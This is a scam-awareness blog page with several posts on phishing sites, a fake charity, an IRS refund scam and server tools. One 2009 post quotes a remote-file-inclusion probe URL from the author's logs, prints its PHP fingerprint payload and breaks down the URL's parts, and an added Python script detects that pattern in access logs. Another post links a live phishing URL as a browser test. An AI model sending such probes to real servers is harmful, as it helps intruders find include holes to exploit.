ScamBlog

Scamdex

Scamdex's Somewhat Cynical Take on Scams
Scamdex is a resource about scams, mainly internet-based. It contains a huge archive of carefully sifted email scams, categorized and analysed. The ScamBlog is commentary on the world of scams - scams which get bigger, cleverer and nastier day by day. These are our thoughts on stuff that makes us mad.

22 May '09

PHP Exploit URL foxes Apache

by @ 1:26 pm. Filed under Phishing, Uncategorized, Websites, humor, servers, spoof websites, tools

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obvious hack attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away’ page :).

In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in its entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’, on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL, does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on its back?

Analyzing the URL gets me to this reduction of required parts:

* any .php file path
* any query string that contains an ‘http://’ in it
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

Any URL with these parts will cause the same problem on an awful lot of famous-name servers, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?
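
The four-part URL shape listed in this post can be matched in web server access logs. The following is an added example, not code from the original post: a Python script that scans Apache-style log lines for that shape. The log lines, the `remote.example` host and the function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Client IP and request target from an Apache common/combined log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" \d{3}')

# Shape described in the post: a parameter value holding an http:// URL
# that has a file extension and ends with a trailing '?'.
REMOTE_FILE_RE = re.compile(r'https?://\S+\.\w{2,4}\?$', re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2009:13:20:01 +0000] "GET /errors.php?error=http://remote.example/files/image/id1.txt? HTTP/1.1" 404 512',
    '192.0.2.10 - - [22/May/2009:13:20:05 +0000] "GET /a.php?b=http%3A%2F%2Fremote.example%2Fc.gif%3F HTTP/1.1" 404 512',
    '198.51.100.7 - - [22/May/2009:13:21:40 +0000] "GET /search.php?q=http+basics HTTP/1.1" 200 2048',
    '203.0.113.5 - - [22/May/2009:13:22:02 +0000] "GET /go.php?url=http://remote.example/page HTTP/1.1" 200 1024',
]

def probe_params(target):
    """Return (name, decoded value) pairs in a request target that match the shape."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith('.php'):
        return []
    # parse_qsl percent-decodes, so encoded variants are matched too.
    return [(name, value)
            for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if REMOTE_FILE_RE.search(value)]

def scan(lines):
    """Return (findings, hits per client IP) for an iterable of log lines."""
    findings, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line in the expected format
        for name, value in probe_params(m['target']):
            findings.append((m['ip'], name, value))
            per_ip[m['ip']] += 1
    return findings, per_ip

if __name__ == '__main__':
    findings, per_ip = scan(SAMPLE_LOG)
    for ip, name, value in findings:
        print(f'{ip} parameter {name!r} -> {value}')
    for ip, count in per_ip.most_common():
        print(f'{ip}: {count} matching request(s)')
```

The per-IP counts give a list of addresses to feed into the IP blocking mentioned earlier in the post.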


25 Mar '09

Who or What is BobBear?

by @ 1:52 pm. Filed under Email Scams, Job Scams, Phishing, Websites, banking, money laundering, spoof websites

In my infrequent callouts to other websites that (like Scamdex) were created out of the blind fury experienced by seeing bad people taking money from good people, I have another site for you to take notice of.

But first, a recap:

When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.

Since then, the field has grown – lots of Government-funded sites have sprung up, large Internet organizations have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to buy Laptops from Nigeria” etc…

But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’

Bob Bear Website Logo

Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.

Please support them – you know it makes sense!


8 Dec '08

… From CPanel to …. what??

by @ 2:26 pm. Filed under Scam Reports, Scamdex, Uncategorized, Websites, servers, spoof websites

I am an old Unix dude, I have installed more different versions of Unix than most people – everything from Sco Xenix/286 thru to Centos5.2 – and I don’t usually have many problems, but as time wears on, my brainDisk is starting to squeal and it’s not as fast at random access as it used to be, so I was really happy when I rented a server with Cpanel/WHM installed on it.
For those who don’t know, Cpanel is the web-based interface to everything you will never learn on a Unix server – plus, the WHM super system allows you to carve off a chunk and sell it or give it away to your pals, reasonably confident that they won’t/can’t screw it up.
Add in virtual web/mail/log server management and lots of useful pre-installed tools and you have a system where you rarely have to get your hands dirty under the #hood.

Well, I love Cpanel now and I have grown to rely on it (curses!) so when it comes to creating my own server, so I can save money on a dedicated one, I find I need it to get things done (and my old stuff transferred).

The problem with CP is that it costs $$money. between $30 and $48/month. and. I. just. don’t. want. to. pay. that. any. more….. so….

Piracy is out – mainly because you need to register the license with CP and also because that’s bad!:’(

Perhaps I could install it, setup my system the way I want and then after a month or so, hand it back??

well, no apparently – most people (Including themselves) seem to be of the opinion that to uninstall CP, you should really re-install Linux…. kind of defeats my object here!

so…. alternatives, anyone?

There are a few – some other commercial (pay $$ for) such as DirectAdmin and some Public Domain ones (Web-CP, WebMin/VirtualMin). So I started evaluating these free Cpanel Alternatives ….

1. WebMin/VirtualMin

Looks like it will do the job – only one of the alts that I’ve heard of and actually used before. Installs easily enough and looks nice – has a fine range of functionality but what lets it down is its non-simplicity. Cpanel’s approach is to show you a bunch of things that you may want to do and ask sensible questions (with usually relevant tooltips close by) to help you accomplish your requirements. WebMin takes the ‘I’ll help you to write the configuration files correctly’ approach – you really have to know what you’re doing and in a lot of cases, the input fields are just blank with no clue as to what to put there.

WebMin Configuring Backup Example Screenshot

This probably highlights the major difference between CPanel/WHM and the rest of the Server Admin systems out there – CP/WHM does some pretty radical things to your server when you install it and this is why it’s so hard to uninstall. The other systems kind of leave things as they are and just act as configuration helpers. As an example, see the two screenshots of the ‘backup’ functions.

Cpanel Domain Owner Backup Page

2. Web-CP

Much, much harder to install, and harder to find the installation instructions too, but seems pretty good so far.

I had problems with the PHP startup scripts being written with DOS line endings which confused the life out of me for a while until I found it.  Still not able to start the system up but suspect it’s something to do with the line that reads:

$args = trim(next($HTTP_SERVER_VARS["argv"]));

(Shouldn’t that just be ARGV for shell scripts?)

… I’ll continue and let you know how I get on.


16 Nov '08

Two REALLY good reasons to use FireFox as your web browser…

by @ 4:59 pm. Filed under Anti-Scam Protection, Websites, spoof websites

I know I keep banging on about this, but one of the easiest and cheapest ways to protect yourself from online scams and phishing is simple: Change your Web Browser!

Here are two really good reasons why you should use FireFox to surf the web instead of the ubiquitous Internet Explorer.

Firefox includes strict anti-phishing and anti-malware measures and it’s open source so it has thousands of security experts around the globe working around the clock to keep you (and your personal information) safe.

1. Anti-Malware

Firefox 3 protects you from viruses, worms, trojan horses and spyware. If you accidentally access an attack site, you’ll receive a full-sized browser message as a warning. A continuously updated list of attack-sites tells us when to stop you from browsing, so there’s nothing for you to update or maintain.

Anti Malware Warning in FireFox

2. Anti-Phishing

Shop and do business safely on the Internet. Firefox gets a fresh update of web forgery sites 48 times in a day, so if you try to visit a fraudulent site that’s pretending to be a site you trust (like your bank), a browser message—big as life—will stop you.


18 Sep '08

PhishTank.com – Anti Phishing Website that Gets Results!

by @ 1:10 pm. Filed under Anti-Scam Protection, Email Scams, Identity Theft, Phishing, spoof websites

PhishTank.com – Anti Phishing Website!

Here’s the thing – from now on, ANY TIME you get an email that sends you to a PayPal/Bank of America/Google Adsense/eBay/your-bank-name site that you know is a scam site [that just wants your login/password/credit card/bank details] – immediately report it to PhishTank.com.

They are the database that many browsers and security firewalls automatically use – within seconds, millions of people are protected! To see if YOUR browser/network is using this service, try this url picked at random from Phishtank’s database this morning – http://bloccatoinlinea.net/

I use Firefox mainly and for me, I get a nice message like this:

Firefox Warns about visiting a Phishing Site

If you get ‘straight through’ without any warnings then you need to seriously consider upgrading your browser to FireFox 3 or even the spiffy new Google Chrome.

Is it worth the effort of reporting it?

Trust me, this isn’t the same as sending an email to abuse@hotwebsites-r-us.cn and hoping that something will happen – this is the real deal – your submission goes into the Phishing database, people are invited to check your submission and vote on it (for or against) and (assuming it’s approved) one more scam website is defeated!

Once you’ve done it once, you might like to sign up and join the band of selfless individuals who monitor, verify and discuss these things (look out for ‘scamdex’!).

Good for your sense of moral outrage and good for the general public – help stamp out Phishing – go to Phishtank.com and sign up NOW!


15 May '08

DNS (whassat?) it’s a great tool against Scammers!

by @ 2:54 pm. Filed under Anti-Scam Protection, Identity Theft, Phishing, Websites, spoof websites

The DNS Route to Scam Protection Online.

When you type in ‘www.scammingsite.com’ on your browser, a lookup is performed to translate the domain name into a unique address (IP Address) that all networked computers understand and which contains the path to the right server.

Your ISP will have given you two longish ‘numbers-separated-by-dots’ (eg. 207.44.123.28) to type in to your Network Settings. These are the Domain Name Servers (DNS) that your computer will use whenever you ask to go to a domain name.

Right? Well, never mind, just trust me on this one.

Wouldn’t it be great if, when you did the lookup/translate part, the result was filtered for Scams/Profanity/Pornography/Crime/Violence etc etc?

Well, by changing the DNS servers you use, you can have this great feature – for free, I may add – and you (and your children/employees) can surf a little easier. No software to download, no subscriptions, no spam – it couldn’t be easier. Free, simple to do, free, great protection …. what more can I say other than if you don’t believe me, Click this button to find out why you need to change your DNS servers NOW!

(or, you can just change your DNS servers to 208.67.222.222 and 208.67.220.220 and get on with your life)

BTW, the same people who run OpenDNS.com also run an Anti-Phishing site called, amusingly, PhishTank.


3 Nov '07

Who owns Westpac-site.org?

by @ 11:33 am. Filed under Email Scams, Identity Theft, Trojans, Viruses, banking, spoof websites

Why do I ask? Well, I got a spam/scam email today that pretends to be an alert from Microsoft, via the Secret Service that a backdoor has been found in Windows XP and that a patch has been released which will ‘fix’ this vulnerability.

Well, as you can imagine, the ‘patch‘ turns out to be a trojan/virus/worm thingy itself.

Interestingly, this scammer uses imageshack.us to host his images.

The download site was WWW.WESTPAC-SITE.ORG, which is hosted by one-and-one, a huge internet web hosting company, and the rest of the details are probably spurious (Ian Arend from Victoria, Australia).

If you go to the westpac-site.org website, you find the beginnings of a Pharming operation, attempting to extract the PIN numbers of people’s credit cards for Bank of America accounts.

I have sent emails to the relevant ISPs to try to get this site down as soon as possible, but people will get burned (unless, that is, they see this posting first!).


20 Jun '07

stopandhelpus.org – Scam Charity Site?

by @ 7:35 am. Filed under Email Scams, Websites, spoof websites

When I get spam from a charity asking specifically for donations I visit the website just to see what kind of organization would use spam to solicit contributions. In most cases it’s a scam. Bona fide charities would NEVER spam you.

So this morning I received the following email

Stop! Help us, we are in need!

We are a non-governmental and non-profit association “Stop ajutane suntem in nevoie”. Taking into account that Romania has been confronted with numerous major problems such as floods, poor children and pensioneers who cannot afford expensive medicines. We want your support to build new dwellings for those who lost them because of the disasters and new homes for the children of the streets where they can be fed and taken good care of.

If you want to help us please visit our website by clicking www.stopandhelpus.org.

Copyright © 2007 Stop ajutane suntem in nevoie
www.stopandhelpus.org All Rights Reserved .

The website www.stopandhelpus.org is a cheesy template site with lots of links and badly written copy. Seems to be run out of Romania which always rings alarm bells.

If you can't see this picture, the site has been taken down - Hooray!

I checked the domain name and, as I suspected, the domain name was registered on 19th June 2007 (Yesterday!) [ding ding]

The domain registrar (the person who owns the domain name) is hidden by a proxy [ding ding ding]

On a side note, these privacy proxies are all very well, but they are used by scammers to slow down investigations of scam websites. I think I’ll send a copy of this to contact@myprivateregistration.com and see if they do anything.

Anyway, if you hadn’t gathered by now, at best ‘stopandhelpus’ is a naive, slightly crummy new charity, staffed by good hearted but shady people or (as I think) they are an out and out scam.

Whatever you do, do not send any money to these scammers. I just hope that this post gets ‘out there’ soon enough so that anyone who searches for STOPANDHELPUS will find this page first.


14 Apr '07

The Inevitable IRS Tax Refund Scam

by @ 8:13 am. Filed under Email Scams, Phishing, banking, spoof websites

The US Internal Revenue Service (IRS) is warning of a new Internet scam based on a site masquerading as a member of the Free File Alliance. The site attempts to get taxpayers to file their information with them. The scammers then change the bank account details to their own and wait for the refund payments to arrive.

The IRS reminded taxpayers the only place to access the Free File program is through the official IRS.gov Web site.

“The final days of the tax season always bring tax scams,” IRS Commissioner Mark W. Everson said. “Make sure you’re really dealing with the IRS. Taxpayers can feel safe using Free File, but the only way to do it is through the secure IRS.gov Web site.”

The latest twist on tax scams involves tax preparation Web sites that inaccurately say they are part of the Free File Alliance, a partnership between 19 tax software companies and the IRS. The IRS is working with the Treasury Inspector General for Tax Administration to look into allegations that the Web sites accepted tax information from taxpayers, changed the taxpayers’ bank account numbers to their own and then filed the return through a legitimate Free File partner.

Taxpayers can avoid this problem by using the official Free File site on IRS.gov. Seventy percent of the nation’s taxpayers are eligible to use the free electronic filing system.


27 Jan '07

Are you using Firefox? – Why Not?

by @ 11:51 am. Filed under Phishing, spoof websites

Firefox has many advantages over the competition, the main one being the toolbar add-in. The first one you should install is Google. The really really great thing about the Google toolbar is the built-in anti-phishing detection/protection system.

The way this works is as follows: You read an email (eg. purportedly from PayPal) that tells you your account needs updating. You click on the link and are taken to a PayPal login page. Before you can say ‘Hey – Since when has Paypal used freescamwebsites.com for its website!’ an overlay locks the whole webpage and a suitable warning comes up (see image).

If you are in any way concerned about Phishing scams (I have been hit myself by a spoof eBay email), get Firefox now.

